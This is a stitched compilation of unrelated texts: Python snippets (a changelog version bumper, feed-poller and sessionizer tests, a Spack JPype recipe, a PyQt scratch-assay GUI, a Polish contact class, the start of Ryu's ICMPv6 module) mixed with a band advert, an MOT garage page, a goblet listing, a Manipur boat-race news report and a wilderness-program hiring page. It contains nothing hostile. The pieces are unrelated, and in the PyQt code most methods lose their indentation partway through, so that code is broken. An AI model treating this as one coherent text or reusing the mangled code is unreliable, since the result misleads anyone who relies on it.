        # "2.6.0" => ["2.7.0", "2.6.1"]
        assert version.endswith(".0"), f"{version} does not look like a minor version"
    else:
        # "3.0.0" => ["3.1.0", "3.0.1"]
        assert version.endswith(".0.0"), f"{version} does not look like a major version"

    logging.debug(f"Getting the new version for {version} - {version_type.name}")
    return [
        get_next_version(version, VersionType.MINOR),
        get_next_version(version, VersionType.PATCH),
    ]
def get_version_type(version: str) -> VersionType:
    """Classify *version* as a major, minor or patch release.

    BUG FIX: the previous implementation used ``str.endswith`` on the whole
    string, which misclassified versions such as "1.10.0" (ends with "0.0")
    as major releases and "2.6.10" (ends with "0") as minor releases.
    The minor and patch components are now compared individually.
    """
    minor, patch = version.split(".")[1:3]
    if minor == "0" and patch == "0":
        version_type = VersionType.MAJOR
    elif patch == "0":
        version_type = VersionType.MINOR
    else:
        version_type = VersionType.PATCH
    return version_type
def get_whats_new(
    version: str, add_date: bool = False, change_date: bool = False
) -> str:
    """Build the underlined "What's New" section header for *version*.

    With ``add_date`` a release-date line is appended: the "TBA" placeholder
    by default, or today's date when ``change_date`` is also True.
    """
    whats_new_text = FULL_WHATS_NEW_TEXT.format(version=version)
    # Header line plus a matching "=====" underline.
    result = [whats_new_text, "=" * len(whats_new_text)]
    if add_date and change_date:
        result += [NEW_RELEASE_DATE_MESSAGE]
    elif add_date:
        result += [RELEASE_DATE_TEXT]
    elif change_date:
        # change_date alone is meaningless: there is no date line to change.
        raise ValueError("Can't use change_date=True with add_date=False")
    logging.debug(
        f"version='{version}', add_date='{add_date}', change_date='{change_date}': {result}"
    )
    return "\n".join(result)
def get_all_whats_new(version: str, version_type: VersionType) -> str:
    """Concatenate fresh "What's New" sections for every upcoming version."""
    sections = [
        get_whats_new(upcoming, add_date=True) + "\n" * 4
        for upcoming in get_next_versions(version, version_type=version_type)
    ]
    return "".join(sections)
def transform_content(content: str, version: str) -> str:
    """Rewrite the changelog *content* for the release of *version*.

    Stamps today's date on the section of *version* and inserts empty
    "What's New" sections for the follow-up versions right above it.
    """
    version_type = get_version_type(version)
    next_version = get_next_version(version, version_type)
    # Header of the released version with the "TBA" placeholder...
    old_date = get_whats_new(version, add_date=True)
    # ...and the same header with today's date instead.
    new_date = get_whats_new(version, add_date=True, change_date=True)
    next_version_with_date = get_all_whats_new(version, version_type)
    do_checks(content, next_version, version, version_type)
    # Remember where the released section starts, so the new empty sections
    # can be inserted right before it after the date replacement below.
    index = content.find(old_date)
    logging.debug(f"Replacing\n'{old_date}'\nby\n'{new_date}'\n")
    content = content.replace(old_date, new_date)
    end_content = content[index:]
    content = content[:index]
    logging.debug(f"Adding:\n'{next_version_with_date}'\n")
    content += next_version_with_date + end_content
    return content
def do_checks(content, next_version, version, version_type):
    """Sanity-check the changelog *content* before it gets rewritten.

    Raises AssertionError with a descriptive message when the changelog is in
    an unexpected state. NOTE(review): ``assert`` is stripped under
    ``python -O``; acceptable for a release helper, not for library code.
    """
    err = "in the changelog, fix that first!"
    NEW_VERSION_ERROR_MSG = (
        "The text for this version '{version}' did not exists %s" % err
    )
    NEXT_VERSION_ERROR_MSG = (
        "The text for the next version '{version}' already exists %s" % err
    )
    wn_next_version = get_whats_new(next_version)
    wn_this_version = get_whats_new(version)
    # There is only one field where the release date is TBA
    if version_type in [VersionType.MAJOR, VersionType.MINOR]:
        assert (
            content.count(RELEASE_DATE_TEXT) <= 1
        ), f"There should be only one release date 'TBA' ({version}) {err}"
    else:
        # A patch release coexists with the next minor's unreleased section.
        next_minor_version = get_next_version(version, VersionType.MINOR)
        assert (
            content.count(RELEASE_DATE_TEXT) <= 2
        ), f"There should be only two release dates 'TBA' ({version} and {next_minor_version}) {err}"
    # There is already a release note for the version we want to release
    assert content.count(wn_this_version) == 1, NEW_VERSION_ERROR_MSG.format(
        version=version
    )
    # There is no release notes for the next version
    assert content.count(wn_next_version) == 0, NEXT_VERSION_ERROR_MSG.format(
        version=next_version
    )
# Script entry point: bump the changelog for the version given on the CLI.
if __name__ == "__main__":
    main()
|
UC returns for another crazy dance party at the Towne Tavern! Free e-z parking, good eats and the drinks will be flowing! Text ur friends & C U where the party will be...with U/C from 8 pm - 12 am! Must be 21 or older.
Style: PARTY DANCE BAND! The Uncommitted delivers the best female fronted high-energy dance show with all your favorite hits of pop, rock, top 40 & more from the 80's thru 2day!
Members: The Uncommitted brings the best, female fronted, high-energy show that will keep your heart pumpin’ and your body jumpin’ on the dance floor! You'll recognize every song. All your favorites from the 80's, 90's & today. You’ll dance for hours and be back for more! Join us on the dance floor & see why everyone is talking about this fun, party dance band!
U/C has a wealth of experience in the music industry so if you're looking for a band to entertain a crowd, dance all night and sing along with every recognizable hit then look no further! With 4 vocalists, tight harmonies and strong musicianship is what we bring to every performance!
All the members from this band are experienced musicians who have played in bands such as: Kaos, Spiral, Special Delivery, No Presents for Christmas, Still All Stars, Still Bound, Garage All Stars, Stagger Wing & The Fashionably Late. We bring a wealth of professionalism and experience to the table as well as a good following of fans! Hire us for your next nightclub gig or private event and keep those cash registers ringing, your dance floor packed and your audience screaming for more! We have a large inventory of music which can please any type of audience.
|
import os
import unittest
import unittest.mock
import feedparser
from plugins.feedretriever.feedretriever import Feedpoller
def noop(*a, **kw):
    """Accept anything and do nothing; default callback for the tests below."""
    pass
# Bound before the tests patch ``feedparser.parse``, so fixture files can
# still be parsed with the real implementation while the code under test
# sees the mock.
feedparse = feedparser.parse
class FeedRetriverTest(unittest.TestCase):
    """Feedpoller behaviour with a mocked ``feedparser.parse`` and canned RSS fixtures."""
    @classmethod
    def setUpClass(cls):
        # Fixture directory, resolved relative to this test module.
        # NOTE(review): joining ".." with dirname(__file__) looks fragile --
        # confirm it resolves correctly when run from other directories.
        cls.dir = os.path.join("..", os.path.dirname(__file__))
    @unittest.mock.patch("feedparser.parse")
    def test_basic_feed(self, read):
        """Creating a poller on an empty feed must not report an error."""
        read.return_value = feedparse(os.path.join(self.dir, "basic_rss_0-entries.xml"))
        Feedpoller(
            {"url": "MOCK_URL", "title": "MOCK_TITLE"},
            on_created=noop,
            on_entry=noop,
            on_error=self.fail,
        )
    @unittest.mock.patch("feedparser.parse")
    def test_no_update(self, read):
        """Polling again with an unchanged (empty) feed must trigger no entries."""
        read.return_value = feedparse(os.path.join(self.dir, "basic_rss_0-entries.xml"))
        feed = Feedpoller(
            {"url": "MOCK_URL", "title": "MOCK_TITLE"},
            # on_entry=self.fail: any delivered entry fails the test.
            on_created=noop,
            on_entry=self.fail,
            on_error=self.fail,
        )
        feed.update_now()
    @unittest.mock.patch("feedparser.parse")
    def test_initial_update(self, read):
        """An entry appearing after creation is delivered to ``on_entry``."""
        read.return_value = feedparse(os.path.join(self.dir, "basic_rss_0-entries.xml"))
        def on_entry(feed, entry):
            self.assertEqual(entry.title, "Test Title")
            self.assertEqual(entry.link, "http://www.example.com")
            self.updated = True
        feed = Feedpoller(
            {"url": "MOCK_URL", "title": "Test"},
            on_created=noop,
            on_entry=on_entry,
            on_error=self.fail,
        )
        self.updated = False
        # Swap in a fixture that now contains one entry and poll again.
        read.return_value = feedparse(os.path.join(self.dir, "basic_rss_1-entries.xml"))
        feed.update_now()
        self.assertTrue(self.updated)
|
Book any of our services ONLINE using out LIVE booking system.
We provide MOT Testing for class 4 and class 7 vehicles with FREE retests.
Book an MOT online now with our live, online booking system. Just select the date and time that suits you from our live, online booking diary. Booking an MOT couldn't be easier with this 24/7 interactive system.
Clean, Comfortable and Prompt Appointments.
Somewhere clean and comfortable to sit and wait, and somewhere for the kids too.
Because we have large vehicle lifts up to 6000kgs with a bed length longer than most class 4 testers we can cope with large motor homes and small horse boxes which normally have to go to a class 7 tester or to the local ministry test station because of their size. Our class 7 Bay can cope with the longest of Transits or Sprinters. If you are in doubt which class your vehicle falls in to please call us, we will be pleased to advise you.
We are the home of Wigley Racing which is a motorbike racing team of twin brothers.
|
from nose.tools import eq_
from ..sessionizer import Sessionizer
def test_sessionizer():
    """Events within the cutoff keep sessions open; a late event closes them."""
    sessionizer = Sessionizer(cutoff=2)
    # Events at t=1 and t=2 fall within the 2-unit cutoff: nothing closes.
    user_sessions = list(sessionizer.process("foo", 1))
    eq_(user_sessions, [])
    user_sessions = list(sessionizer.process("bar", 2))
    eq_(user_sessions, [])
    user_sessions = list(sessionizer.process("foo", 2))
    eq_(user_sessions, [])
    # t=10 is far beyond the cutoff: two expired sessions are returned.
    user_sessions = list(sessionizer.process("bar", 10))
    eq_(len(user_sessions), 2)
    # Only the session opened by the t=10 event is still active.
    user_sessions = list(sessionizer.get_active_sessions())
    eq_(len(user_sessions), 1)
def test_none_comparison():
    """Users keyed by tuples containing None must not break session tracking."""
    sessionizer = Sessionizer(cutoff=2)
    # Mixed keys: (None, str) tuples alongside (int, str) tuples.
    user_sessions = list(sessionizer.process((None, "123"), 0, "AIDS"))
    eq_(user_sessions, [])
    user_sessions = list(sessionizer.process((1, "foobar"), 1, "Foobar"))
    eq_(user_sessions, [])
    # Same user again, this time with a None payload.
    user_sessions = list(sessionizer.process((1, "foobar"), 1, None))
    eq_(user_sessions, [])
    user_sessions = list(sessionizer.process((None, "234"), 1, "Foobar"))
    eq_(user_sessions, [])
    user_sessions = list(sessionizer.process((None, "234"), 1, "Barfoo"))
    eq_(user_sessions, [])
    # t=10 exceeds the cutoff for all three users: their sessions close.
    user_sessions = list(sessionizer.process((1, "foobar"), 10))
    eq_(len(user_sessions), 3)
|
The goblet is surrounded by elegant lost wax cast bronze, gilded and silver plated, depicting the Last Supper.
Height 17 cm / 6,69"
Height cm 21 / 8,27"
In gilded metal. The goblet is surrounded by elegant lost wax cast bronze, gilded and silver plated, depicting the Last Supper.
It has a 15 cm diameter.
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyJpype(PythonPackage):
    """JPype is an effort to allow python programs full access to java class
    libraries."""
    homepage = "https://github.com/originell/jpype"
    url = "https://pypi.io/packages/source/J/JPype1/JPype1-0.6.2.tar.gz"
    # version(<release>, <md5 checksum of the source tarball>)
    version('0.6.2', '16e5ee92b29563dcc63bbc75556810c1')
    version('0.6.1', '468ca2d4b2cff7802138789e951d5d58')
    version('0.6.0', 'f0cbbe1d0c4b563f7e435d2bffc31736')
    depends_on('python@2.6:')
    depends_on('py-setuptools', type='build')
    # A JVM is needed both to build the native extension and at runtime.
    depends_on('java', type=('build', 'run'))
    # extra requirements
    # depends_on('py-numpy@1.6:', type=('build', 'run'))
|
Pothashang News Service: Imphal, September 20, 2018: “Heikru Hidongba” festival of Manipur was celebrated on Thursday with “Hiyang Tannaba” a traditional boat race at Sagolband Bijoy Govinda Thangabat (a moat) in Imphal with pomp and gaiety.
Manipur governor Dr. Najma Heptulla graced the 240th Heikru- Hidongba celebration as the chief guest. It was organised by Shri Shri Bijoy Govinda Sevayet Committee.
Heptulla said it is her second time attending the Heikru Hidongba.
The festival is observed by the Meitei community on the eleventh day of the fortnight of Langban month or September of the Meitei calendar every year. It is considered as an important and joyous festival and has been observed for years at the Moat or Thangapat of Shri Shri Bijoy Govindajee Temple. Recognising the significance of the festival, she instituted the Governor’s Trophy for the Boat Race, she added.
Heikru-Hidongba is a socio-religious ceremony performed every year accompanied with the exciting contest of ‘Hiyang Tanaba’ or Boat Race in the sacred Thangapat Moat of Sagolband, Bijoy Govinda. This festival is not a mere visual festivity but a festival accompanied with the old folklore tradition and culture of the Meiteis and reviving age-old tradition in the form of a festival, she added.
She said Heikru-Hidongba is an annual event performed in the shape of worship and game to commemorate the mysterious way of victory by our heroic fore-fathers over the invincible hordes of foreign aggressors. Heikru-Hidongba festival, therefore, is celebrated based on historical truth. It is also a ceremony to signify the symbol of unity that was once deeply rooted amongst our heroic and loyal forefathers in their struggles for the nation’s peace and freedom, she added.
She also stated that the festival has also a great meaning in the field of moral science and political philosophy. The more we observe and study this public function, the more we will learn about the heart and soul of our ancestors who sacrificed their most precious lives without the least grumbling for peace and freedom of our people.
The governor gave the governor’s trophy, certificates and cash prize of Rs 15,000 to the winner and Rs 10,000 and certificates to the runners-up team of the boat race.
|
from PyQt5 import QtCore, QtGui, QtWidgets
_fromUtf8 = lambda s: s
import sys,os
import wound_view as view
import engine
class woundWindow ( QtWidgets.QMainWindow ):
    def __init__ ( self, parent = None ):
        """Create the main window, build the Qt UI and wire up the signal handlers."""
        QtWidgets.QMainWindow.__init__( self, parent )
        self.setWindowTitle( 'Scratch Test Wizard' )
        self.ui = view.Ui_facewindow()
        self.ui.setupUi( self )
        self.setConnections()
        # True while refreshTree() rebuilds the tree, so item callbacks
        # triggered by the rebuild can be ignored.
        self.rebuilding = False
        # Tree item last clicked by the user (None until the first click).
        self.selectedItem = None
    def refreshTree(self):
        """Rebuild the tree widget from ``self.exp``.

        The hierarchy mirrors the data model: timepoint -> well -> picture.
        ``self.rebuilding`` is raised while items are inserted so selection
        callbacks fired during the rebuild are ignored.
        """
        self.rebuilding = True
        self.ui.treeWidget.clear()
        for i in range(len(self.exp)):
            el = QtWidgets.QTreeWidgetItem(self.ui.treeWidget)
            # Keep a back-reference to the model object on every tree item.
            el.src= self.exp[i]
            if self.exp[i].time is None:
                # Fall back to a positional label when no timestamp is known.
                tm = 'T{}'.format(i)
            else:
                tm = self.exp[i].time
            el.setText(0,tm)
            for w in self.exp[i]:
                e = QtWidgets.QTreeWidgetItem(el)
                e.src = w
                e.setText(0,w.basename)
                #e.setBackground(0,QtGui.QColor(255, 0, 0, 127))
                n=1
                for p in w:
                    o = QtWidgets.QTreeWidgetItem(e)
                    o.src = p
                    o.setText(0, p.filename)
                    #o.setForeground(0,QtGui.QColor(255,0,0,255))
            self.ui.treeWidget.addTopLevelItem(el)
        self.rebuilding = False
        #fname = QtWidgets.QFileDialog.getOpenFileName(self, 'Select file', './')
        #q = QtWidgets.QFileDialog()
        #q.setAcceptMode(QtWidgets.QFileDialog.AcceptOpen)
        #q.setFileMode(QtWidgets.QFileDialog.ExistingFiles)
        #progress = QtWidgets.QProgressDialog("Opening files...", "Cancel opening", 0, pmax)
    def selectElement(self,item):
        """Remember the clicked tree item and echo it in the status bar."""
        if self.rebuilding is True:
            # Ignore selection events generated while the tree is rebuilt.
            return
        self.selectedItem = item
        self.ui.statusBar.showMessage('ITEM {} depth {}'.format(item.src.basename,item.src.depth))
        #self.ui.treeWidget.itemWidget()
def expSave(self):
filtered = QtWidgets.QFileDialog.getSaveFileName(self,caption='Save the experiment',filter='*.exp')
if filtered[0] != '':
filename = filtered[0]
if filename[-4:] != '.exp':
filename = filename + '.exp'
self.exp.save(filename)
def expLoad(self):
selection = QtWidgets.QFileDialog.getOpenFileName (self, caption='Select an experiment file',filter='*.exp')
filename = selection[0]
if not os.path.isfile(filename):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
self.exp = engine.load(filename)
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
def expGuess(self):
folder = QtWidgets.QFileDialog.getExistingDirectory(self, 'Select a directory', './')
if not os.path.isdir(folder):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
exp = engine.exp()
if exp.guess(folder):
self.exp = exp
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
else:
QtWidgets.QApplication.restoreOverrideCursor()
QtWidgets.QMessageBox.information(self, 'ERROR', 'The proposed directory could not be guessed as an experiment')
    def rewatch(self):
        """Redisplay the currently selected item with the current view settings."""
        self.watch()
    def watch(self,element=None):
        """Show the picture of ``element`` (default: current selection) in the view.

        What is displayed depends on the view radio buttons: the raw file,
        the stored overlay (when the picture was already processed), or an
        on-the-fly reprocessing using the current UI parameter values.
        """
        if self.rebuilding is True:
            return
        if element is None:
            element = self.selectedItem
        myelement = element.src
        if myelement.is_picture():
            # Loading / processing can be slow: show a busy cursor.
            QtWidgets.QApplication.setOverrideCursor( QtGui.QCursor(QtCore.Qt.WaitCursor))
            if self.ui.view_raw.isChecked():
                # Raw image straight from disk.
                self.ui.pic.setPixmap( QtGui.QPixmap(myelement.dir) )
            elif self.ui.view_stored.isChecked():
                if myelement.isProcessed():
                    self.ui.pic.setPixmap(QtGui.QPixmap(myelement.getOverlay()))
                else:
                    # No stored result yet: fall back to the raw image.
                    self.ui.pic.setPixmap(QtGui.QPixmap(myelement.dir))
            elif self.ui.view_otf.isChecked():
                # Re-run the segmentation with the current slider values.
                myelement.process( sens = self.ui.cannysigma.value()/100.0, minhole=self.ui.minholes.value(),minobj=self.ui.minobj.value() )
                self.ui.pic.setPixmap(QtGui.QPixmap(myelement.getOverlay()))
            QtWidgets.QApplication.restoreOverrideCursor()
def tpAdd(self):
folder = QtWidgets.QFileDialog.getExistingDirectory(self, 'Select a TimePoint directory', './')
if not os.path.isdir(folder):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
tp = engine.timepoint()
if tp.guess(folder):
self.exp.append(tp)
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
else:
QtWidgets.QApplication.restoreOverrideCursor()
QtWidgets.QMessageBox.information(self, 'ERROR', 'The proposed directory could not be guessed as a TimePoint')
def tpDel(self):
    """Remove the selected TimePoint from the experiment and refresh the
    tree; does nothing when the selection is not a TimePoint."""
    node = self.selectedItem.src
    if not node.is_timepoint():
        return
    position = self.exp.index(node)
    del self.exp[position]
    self.refreshTree()
def wellAdd(self):
    """Prompt for a directory and append it as a Well under the selected
    TimePoint; does nothing when the selection is not a TimePoint."""
    node = self.selectedItem.src
    if not node.is_timepoint():
        return
    picked = QtWidgets.QFileDialog.getExistingDirectory(self, 'Select a TimePoint directory', './')
    if not os.path.isdir(picked):
        return
    QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
    newcomer = engine.well()
    recognised = newcomer.guess(picked)
    if recognised:
        node.append(newcomer)
        self.refreshTree()
    QtWidgets.QApplication.restoreOverrideCursor()
    if not recognised:
        QtWidgets.QMessageBox.information(self, 'ERROR', 'The proposed directory could not be guessed as a Well')
def wellDel(self):
    """Remove the selected Well from its parent TimePoint and refresh the
    tree; does nothing when the selection is not a Well."""
    node = self.selectedItem.src
    if not node.is_well():
        return
    position = node.parent.index(node)
    del node.parent[position]
    self.refreshTree()
def picDel(self):
    """Remove the selected Picture from its parent Well and refresh the
    tree; does nothing when the selection is not a Picture."""
    node = self.selectedItem.src
    if not node.is_picture():
        return
    position = node.parent.index(node)
    del node.parent[position]
    self.refreshTree()
def picAdd(self):
    """Prompt for an image file and append it as a Picture under the
    selected Well.

    Does nothing when the current selection is not a Well or the file
    dialog is cancelled; shows an error dialog when the chosen file cannot
    be recognised as a picture.
    """
    well = self.selectedItem.src  # renamed from misleading `tp`
    if well.is_well():
        selection = QtWidgets.QFileDialog.getOpenFileName(self, caption='Select a Picture', filter='*.*')
        filename = selection[0]  # getOpenFileName returns (path, chosen_filter)
        if not os.path.isfile(filename):
            return
        QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
        pic = engine.picture()
        if pic.guess(filename):
            well.append(pic)
            self.refreshTree()
            QtWidgets.QApplication.restoreOverrideCursor()
        else:
            QtWidgets.QApplication.restoreOverrideCursor()
            # BUG FIX: message previously said "The proposed directory could
            # not be guessed as a Well" -- copy-paste from wellAdd().  This
            # dialog is about a picture *file*.
            QtWidgets.QMessageBox.information(self, 'ERROR', 'The selected file could not be guessed as a Picture')
def setConnections(self):
    """Wire menu actions, tree selection and the view controls to slots.

    The view radio buttons and processing spin boxes go through rewatch()
    rather than watch(): their signals carry a payload (e.g. the new
    spin-box value) that must not be passed to watch() as `element`.
    """
    #clickable1=[self.ui.radio_view,self.ui.radio_deriv,self.ui.radio_smooth]
    #editable =[self.ui.derorder,self.ui.s_mth,self.ui.s_vth,self.ui.sg_fw,self.ui.sg_mm,self.ui.plath,self.ui.lasth]
    #for o in clickable1:
    # o.clicked.connect(self.refreshCurve)
    #for o in editable:
    # o.editingFinished.connect(self.updateCurve)
    # o.valueChanged.connect(self.reddish)
    # Experiment-level actions.
    self.ui.actionGuess.triggered.connect(self.expGuess)
    self.ui.actionLoad.triggered.connect(self.expLoad)
    self.ui.actionSave.triggered.connect(self.expSave)
    self.ui.treeWidget.currentItemChanged.connect(self.selectElement)
    # Add/remove actions for TimePoints, Wells and Pictures.
    self.ui.actionAdd.triggered.connect(self.tpAdd)
    self.ui.actionRemove.triggered.connect(self.tpDel)
    self.ui.actionAddWell.triggered.connect(self.wellAdd)
    self.ui.actionRemoveWell.triggered.connect(self.wellDel)
    self.ui.actionAddPic.triggered.connect(self.picAdd)
    self.ui.actionRemovePic.triggered.connect(self.picDel)
    # Preview refresh triggers (see docstring on why rewatch is used).
    self.ui.treeWidget.currentItemChanged.connect(self.watch)
    self.ui.view_stored.clicked.connect(self.rewatch)
    self.ui.view_raw.clicked.connect(self.rewatch)
    self.ui.view_otf.clicked.connect(self.rewatch)
    self.ui.cannysigma.valueChanged.connect(self.rewatch)
    self.ui.minobj.valueChanged.connect(self.rewatch)
    self.ui.minholes.valueChanged.connect(self.rewatch)
    QtCore.QMetaObject.connectSlotsByName(self)
if __name__ == "__main__":
    # Script entry point: build the Qt application, show the main window
    # and hand control to the Qt event loop; the process exit status is
    # the event loop's return value.
    app = QtWidgets.QApplication(sys.argv)
    app.setApplicationName( 'Scratch assay Wizard' )
    canale = woundWindow()
    canale.show()
    #QtCore.QObject.connect( app, QtCore.SIGNAL( 'lastWindowClosed()' ), app, QtCore.SLOT( 'quit()' ) )
    sys.exit(app.exec_())
|
If you become a member of the RedCliff Ascent field staff, then you will live alongside students in the wilderness. You will be together for eight days at a time. During your time in the field, you will do everything that the students do, sharing the experiences of camping, hiking, primitive skills, and navigating group dynamics. Because RCA provides wilderness training, the appropriate attitude can often be the most important quality. RCA looks for people with a “we” mentality in their field staff, not an “us” vs. “them” mindset.
"We look for people who are humble. We look for people who are hungry to have a positive influence on others." said Emily Novakovich, Human Resources Manager. "In addition, we look for people who are socially smart, and we look for people who are believers in the wilderness. We want people who are always going to be working on improving and learning."
RCA understands that families are trusting us with the safety of their children. It is a responsibility that we take very seriously. As a result, our hiring process is thorough.
If you are interested in working for RCA, then the first step is to complete an online inquiry form. The hiring managers at RCA will look at your previous experience. For example, they will evaluate whether or not you have worked in wilderness programs in the past. They will also look for wilderness first responder certification. However, RCA is willing to provide training to those who share their core values but may not have much previous wilderness experience.
Wilderness work is unique. If you have not experienced working in the wilderness before in another program, then it is difficult to imagine what the job requires. RCA will give you the opportunity to discover what wilderness work is like for yourself.
The next step is a one-week job preview. This preview lasts about the same time as one shift. During this preview, you will interact with our students and learn about our policies and procedures. If you like what you experience during the preview, then you may complete an application. RCA offers positions to the best applicants based on their performance during the preview, their resume, and professional references.
If RCA offers you a position, then you would begin a training period. This includes two days of training on Positive Control Systems (PCS). PCS includes learning how to build rapport with students and de-escalate conflict situations.
There is also one day of orientation. The orientation process will help you to understand the basics of what it means to work at RCA. If you do not have any previous wilderness experience, then you will have an additional training period. This training period is in accordance with state regulations. You will not become field staff right away. First, you will become an intern. You will work as an intern for three shifts, or 24 days total. During this time, you will be provided with training that will help you to pass an exam to demonstrate proficiency at the end of your internship period.
In order to complete your training, you will be expected to perform well in a variety of areas, including teaching and supervisory skills, water and food procurement, conservation and sanitation, and other procedures. The internship period is broken down into different sections so that you will cover all aspects of your required training. You will be asked to complete certain tasks that correspond to different aspects of your training examination. Therefore, by the time you are ready to take your state exam, you will be able to demonstrate proficiency.
The training process can seem intense, but that is because we are being entrusted with an intense amount of responsibility. If you are interested in working for RCA because you want to help at-risk youth, please consider applying. RCA is always looking for compassionate people who believe in the ability of the wilderness to heal.
|
class Kontakt:
    """A contact (first name + surname) owning a list of addresses.

    Iterating over a Kontakt yields its addresses in insertion order.
    """

    def __init__(self, imie, nazwisko, adresy=None):
        # BUG FIX: the default used to be a mutable list (`adresy=[]`),
        # which is evaluated once and shared by every instance created
        # without an explicit address list; use a None sentinel instead.
        self.imie = imie
        self.nazwisko = nazwisko
        self.adresy = [] if adresy is None else adresy

    def __iter__(self):
        # Reset the cursor so each `for` loop starts at the first address.
        # NOTE: the cursor lives on the instance, so nested iteration over
        # the same Kontakt shares one cursor (pre-existing design).
        self.current_element = 0
        return self

    def __next__(self):
        if self.current_element >= len(self.adresy):
            raise StopIteration
        address = self.adresy[self.current_element]
        self.current_element += 1
        return address
class Adres:
    """A free-form address: every keyword argument becomes an attribute."""

    def __init__(self, **kwargs):
        # Store each keyword argument directly as an instance attribute.
        self.__dict__.update(kwargs)

    def __str__(self):
        # Render exactly as the attribute dict prints.
        return str(self.__dict__)
# Demo: build a contact with several NASA-related addresses.  Adres accepts
# arbitrary keyword arguments, so entries may omit fields (`stan`) or carry
# None (`ulica`).
kontakt = Kontakt(imie='Jan', nazwisko='Twardowski', adresy=[
    Adres(ulica='2101 E NASA Pkwy', miasto='Houston', stan='Texas',
          kod='77058', panstwo='USA'),
    Adres(ulica=None, miasto='Kennedy Space Center', kod='32899',
          panstwo='USA'),
    Adres(ulica='4800 Oak Grove Dr', miasto='Pasadena', kod='91109',
          panstwo='USA'),
    Adres(ulica='2825 E Ave P', miasto='Palmdale', stan='California',
          kod='93550', panstwo='USA'),
])

# Iterating a Kontakt yields its addresses (see Kontakt.__iter__/__next__).
for adres in kontakt:
    print(adres)
|
Leon Wing has taken on writing wholeheartedly after taking online courses from Open University and University of Iowa.
Leon Wing’s poems can be found in PoetryPoem, Readings from Readings 2, The Malaysian Poetic Chronicles, Eksentrika, Rambutan Literary, Haikuniverse.
A poem about the Syrian migration to Europe is featured in the Fixi anthology Little Basket 2017. He occasionally takes some poem apart and puts it back together, on the poetry blog https://puisipoesy.blogspot.com.
He has short stories published in Eksentrika, Queer Southeast Asia and a Canadian Asian literary magazine Ricepaper, and in anthologies like PJ Confidential and Remang, a collection of Malaysian ghost stories.
|
# Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import struct
import sys
import array
import binascii
from . import packet_base
from . import packet_utils
from ryu.lib import addrconv
from ryu.lib import stringify
# ICMPv6 message type numbers (RFC 2463 error/informational messages plus
# the neighbour-discovery and MLD types).
ICMPV6_DST_UNREACH = 1          # dest unreachable, codes:
ICMPV6_PACKET_TOO_BIG = 2       # packet too big
ICMPV6_TIME_EXCEEDED = 3        # time exceeded, code:
ICMPV6_PARAM_PROB = 4           # ip6 header bad
ICMPV6_ECHO_REQUEST = 128       # echo service
ICMPV6_ECHO_REPLY = 129         # echo reply
MLD_LISTENER_QUERY = 130        # multicast listener query
MLD_LISTENER_REPOR = 131        # multicast listener report
MLD_LISTENER_DONE = 132         # multicast listener done
# Correctly spelled alias for the truncated name above; the old name is
# kept so existing callers keep working.
MLD_LISTENER_REPORT = MLD_LISTENER_REPOR
# RFC2292 decls
ICMPV6_MEMBERSHIP_QUERY = 130   # group membership query
ICMPV6_MEMBERSHIP_REPORT = 131  # group membership report
ICMPV6_MEMBERSHIP_REDUCTION = 132  # group membership termination
ND_ROUTER_SOLICIT = 133         # router solicitation
ND_ROUTER_ADVERT = 134          # router advertisment
ND_NEIGHBOR_SOLICIT = 135       # neighbor solicitation
ND_NEIGHBOR_ADVERT = 136        # neighbor advertisment
ND_REDIREC = 137                # redirect
# Correctly spelled, backward-compatible alias for ND_REDIREC.
ND_REDIRECT = ND_REDIREC
ICMPV6_ROUTER_RENUMBERING = 138  # router renumbering
ICMPV6_WRUREQUEST = 139         # who are you request
ICMPV6_WRUREPLY = 140           # who are you reply
ICMPV6_FQDN_QUERY = 139         # FQDN query
ICMPV6_FQDN_REPLY = 140         # FQDN reply
ICMPV6_NI_QUERY = 139           # node information request
ICMPV6_NI_REPLY = 140           # node information reply
ICMPV6_MAXTYPE = 201
class icmpv6(packet_base.PacketBase):
    """ICMPv6 (RFC 2463) header encoder/decoder class.

    An instance has the following attributes at least.
    Most of them are same to the on-wire counterparts but in host byte order.
    __init__ takes the correspondig args in this order.

    .. tabularcolumns:: |l|p{35em}|

    ============== ====================
    Attribute      Description
    ============== ====================
    type\_         Type
    code           Code
    csum           CheckSum
                   (0 means automatically-calculate when encoding)
    data           Payload.
                   ryu.lib.packet.icmpv6.echo object, or \
                   ryu.lib.packet.icmpv6.nd_neighbor object, or a bytearray.
    ============== ====================
    """

    # Fixed header: type (1 octet), code (1 octet), checksum (2 octets),
    # all big-endian.
    _PACK_STR = '!BBH'
    _MIN_LEN = struct.calcsize(_PACK_STR)
    # Maps ICMPv6 "type" values to the sub-decoder class registered for them.
